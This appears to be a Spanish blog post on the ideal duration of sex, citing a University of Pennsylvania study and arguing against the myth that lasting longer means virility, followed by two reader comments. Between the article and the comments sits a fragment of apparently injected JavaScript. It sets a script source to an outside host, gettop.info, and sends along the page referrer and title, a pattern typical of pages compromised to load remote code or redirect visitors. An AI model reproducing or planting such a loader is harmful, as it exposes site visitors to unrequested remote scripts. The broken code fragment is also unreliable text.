Salud y belleza » Salud, Salud sexual

Cuánto debe durar el sexo

2 Comentarios

En temas de sexo y relaciones sexuales existe mucha controversia y también dudas. Sin embargo, cada pareja y cada acto sexual son únicos. Pero hay personas que piensan que si el acto sexual es muy prolongado es porque el hombre es un semental y un “macho alfa”. Sin embargo, es una idea un tanto absurda.

duracion-relaciones-sexuales

Por esa razón muchos hombres cargan con perjuicios que no deberían tener y se afanan por conseguir durar más haciendo el amor, lo que puede provocar justo lo contrario, que empeore la relación sexual de la pareja por la frustración y que acabe causando frustraciones sexuales.

Sin embargo, no deberían pensar así, puesto que según una investigación realizada por la Universidad de Pensilvania, el acto sexual ideal no debería durar más de 13 minutos. Cuanto más se exceda de ese tiempo, peor, porque en realidad no es placentero para la pareja tanto tiempo y es muy cansado.

El tiempo ideal es entre 3 y 13 minutos, dependiendo claro de la excitación de ambos y del entorno y el tiempo que se tenga. Por tanto, el mito del macho viril que dura 30 minutos o más en la cama en realidad ni es sano, ni es normal, ni es ideal.

Muchos hombres temen no dar la talla y se frustran sin motivo. Por eso es mejor el conocimiento antes que la ignorancia para mejorar la calidad de vida y, por qué no, las relaciones sexuales.

¿Cuál crees que es el tiempo ideal de duración del sexo?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; }

Más consejos de salud y belleza :

2 Comments »

  • Nacha said:

    Es cierto que cada ocasión se merece un tiempo distinto. Normalmente yo en 5 o 7 minutos estoy satisfecha, pero no debe haber un estándar, debería ser libre, pues me acuerdo que alguna vez duramos 30 minutos en la cama y fue muy bonito. Depende de cada ocasión, claro y de las ganas de cada uno. Más tiempo no es igual a más hombría.

  • Freedy said:

    No comparto lo que dices por aquí, es súper importante aguantar en la cama , o uno si no aguanta que puede recuperarse rápido , hay mujeres como la dejes a medias te manda a la mierda ..

    Yo creo que hay qe escribir un artículo con consejos y trucos de como aguantar más en la cama

    De hecho he aprendido muchos trucos y de allí mi vida sexual ha cambiado mucho , para bien las minera qe me tocan se quedan satisfecha y eso retroalimenta mi ego y hace que sepa como tratar bien a una mujer en la cama .
    Es como un círculo vicioso

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.